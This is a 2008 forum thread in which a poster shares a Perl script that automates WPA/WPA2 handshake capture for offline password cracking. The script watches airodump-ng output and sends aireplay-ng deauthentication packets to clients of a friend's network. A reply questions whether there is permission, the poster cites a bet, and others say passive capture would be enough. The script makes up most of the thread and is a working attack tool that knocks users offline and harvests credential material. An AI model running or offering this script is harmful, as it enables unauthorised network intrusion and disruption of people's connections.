Results 1 to 7 of 7

Thread: [GUIDE] How to make WPA/WPA2 crack automatic!

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Exclamation [GUIDE] How to make WPA/WPA2 crack automatic!

    Hi ,
    yesterday I did a question in Tutorials & Guides without receiving any reply.
    I'm supposing that my problem is quite common so I decided to ... try to solve it.
    My problem: my friend has a wireless network WPA2 protected. I read the fantastic guide how to crack WPA/WPA2 and I tried to use it. The problem is that when I start airodump-ng there are no clients associated to the network. Maybe my friend connects to the network when I'm at work
    How to solve it?
    If I read well the guide it seems that the last part (running of aircrack-ng) could be done "offline" when there are no clients associated. The client-important part of the whole process is to take the handshake key and often there are no clients when you want it.
    So I write a perl script which should help you to find the handshake.
    The tipical scenario is: in the morning you start a shell in which you prepare your wireless adapter (monitor mode) and start airodump-ng.
    From crontab or one other shell you start in background my perl script and then you ... go to work.
    The purpose is: when you come back from work, you have a flile with handshake key (if in all day your friend connects to his network...) and this let you to continue the cracking process.
    I wanted to insert the topic in Tutorials & Guides section but .... I can't write to that section.
    I have to insert the script below because I can't find a way to insert an attachment.
    I ended to finish to write the script 5 minutes ago and I'm at work. So I don't test it(anyway there is no dangerous operations...).
    Suggestions and enhancement are welcome

    +++++++++++++++++++++++++++
    Perl Script
    +++++++++++++++++++++++++++

    #!/usr/bin/perl
    # Autore: Spinmar
    # Date: 20/06/2008
    # -------------------------------

    use POSIX qw(setsid);
    use Getopt::Std;

    $|=1;

    my $SLEEP_TIMEOUT = 10;

    getopt('iow');

    if (!defined($opt_i) && !defined($opt_o) && !defined($opt_w)) {
    print STDERR "usage: check_airodump.pl -i <file(\.txt) with option -w in airodump> -o <file_out_wpa_handshake> -w <wireless_adapter>\n";
    exit;
    }

    my $FILE_OUT_AIRODUMP = $opt_i;

    if (!-e $FILE_OUT_AIRODUMP) {
    print STDERR "File $FILE_OUT_AIRODUMP doesn't exist!! Please insert absolute path\n";
    exit;
    }

    my $FILE_OUT_HANDSHAKE = $opt_o;

    my $WIRELESS_ADAPTER = $opt_w;

    my $BSSID = '';
    my $flag_exit = 0;

    while (1) {
    INIT:
    if ($flag_exit) {
    #kill aireplay-ng (it should be already stopped) and airodump-ng processes

    my $airodump_ng = `ps aefx | grep 'airodump-ng' | grep -v grep`;
    if (!defined($airodump_ng) || (length($airodump_ng) < 5)) {
    print STDERR "No airodump-ng in execution\n";
    exit;
    }
    my @tmp = split /\s+/, $airodump_ng;
    if ($#tmp < 2) {
    print STDERR "Error getting airodump-ng pid\n";
    exit;
    }
    my $pid_process = $tmp[0];
    if ($pid_process !~ /\d+/) {
    print STDERR "Pid airodump-ng strange!! Not a number\n";
    exit;
    }
    my $stop_airodump = `kill -9 $pid_process`;

    my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
    if (!defined($aireplay_ng) || (length($aireplay_ng) < 5)) {
    print STDERR "[INFO]No aireplay in execution\n";
    exit;
    }
    @tmp = split /\s+/, $aireplay_ng;
    if ($#tmp < 2) {
    print STDERR "[INFO]Error getting aireplay-ng pid\n";
    exit;
    }
    $pid_process = $tmp[0];
    if ($pid_process !~ /\d+/) {
    print STDERR "[INFO]Pid aireplay-ng strange!! Not a number\n";
    exit;
    }
    my $stop_aireplay = `kill -9 $pid_process`;
    exit;
    }

    $num = 0;
    my $station = 0;
    my $pwr = 0;
    my %list_bssid = ();
    my %list_bssid_station = ();

    open(FILEHANDLE, "<$FILE_OUT_AIRODUMP") or die("Error to open file $FILE_OUT_AIRODUMP\n");
    LOOP: while(<FILEHANDLE>) {
    if ($num == 0) {
    #First Line: I lookfor WPA handshake
    chop($_);
    if ($_ =~ /WPA handshake:\s(.+)$/) {
    #FOUND!!!
    # The handshake output file contains:
    # <BSSID of examined network> - <WPA handskake>
    my $hand_shake = $1;
    open(FILEHANDLE_HS, ">$FILE_OUT_HANDSHAKE") or die("Error to open file $FILE_OUT_HANDSHAKE\n");
    print FILEHANDLE_HS "$BSSID - $hand_shake\n";
    close (FILEHANDLE_HS);
    $flag_exit = 1;
    close (FILEHANDLE);
    goto INIT;
    }
    }
    chop($_);
    my @tmp = split /\s+/, $_;
    if ($#tmp == 0) {
    $num++;
    next LOOP;
    }

    if ($tmp[1] eq 'PWR') {
    $pwr = 1;
    $num++;
    next LOOP;
    }
    elsif ($tmp[1] eq 'STATION') {
    $station = 1;
    $pwr = 0;
    $num++;
    next LOOP;
    }
    else {
    if ($pwr) {
    # I only get WPA/WPA2.
    # list_bssid = BSSID -> ESSID
    if (($tmp[8] eq 'WPA') || ($tmp[8] eq 'WPA2')) {
    $list_bssid{$tmp[0]} = $tmp[$#tmp];
    }
    }
    elsif ($station) {
    if (($tmp[0] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && ($tmp[1] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && (exists($list_bssid{$tmp[0]}))) {
    $list_bssid_station{$tmp[0]} = $tmp[1];
    }
    }

    }
    #my @tmp = split /\|/, $_;

    $num++;
    }
    close (FILEHANDLE);

    #Check if there is other aireplay-ng processes
    my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
    if (defined($aireplay_ng) && (length($aireplay_ng) > 5)) {
    goto DORMI;
    }

    my ($key, $value);

    while(($key, $value) = each(%list_bssid_station)) {
    $BSSID = $key;
    system("nohup aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER &");
    #One other way to do this
    #my $pid = fork();
    #die "Can't fork $!" unless defined $pid;
    #if (!$pid) {
    #open (STDIN "</dev/null");
    #open (STDOUT ">/dev/null");
    #open (STDERR ">&STDOUT");
    #exec "aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER";
    #exit(0);
    #}
    goto DORMI;
    }

    DORMI:
    sleep($SLEEP_TIMEOUT);
    }

    exit(0);

    ++++++++++++++++++++++++++++++++++++
    Fine
    ++++++++++++++++++++++++++++++++++++

    Best regards

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    Couldn't you just leave airodump-ng running until you get home?
    And you also asked your "friend" if you can do this? From what you wrote it sounds like you dont have permission.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    My friend and I made a bet: I have 5 days to find his password.
    The prize is a ... pizza
    If I leave running airodump-ng all day and if my friend connects when I'm not present, how can I do to run aireplay-ng?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by jackabee View Post
    Couldn't you just leave airodump-ng running until you get home?
    And you also asked your "friend" if you can do this? From what you wrote it sounds like you dont have permission.
    Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

    Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    Quote Originally Posted by pureh@te View Post
    Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

    Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.
    Oh my god !!
    I didn't understand aireplay-ng!!
    So if there are no clients, if I leave airodump-ng running, if a client connects is handshake captured? But if it disconnets, the handshake remains in the airodump-ng window?

  6. #6
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by spinmar View Post
    Oh my god !!
    I didn't understand aireplay-ng!!
    So if there are no clients, if I leave airodump-ng running, if a client connects is handshake captured? But if it disconnets, the handshake remains in the airodump-ng window?
    As long as you write the captured data to a file the handshake will not disappear regardless if the client disconnects at once.
    -Monkeys are like nature's humans.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    The prize is a ... pizza
    Man get ur ass movin you cant miss out on this

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •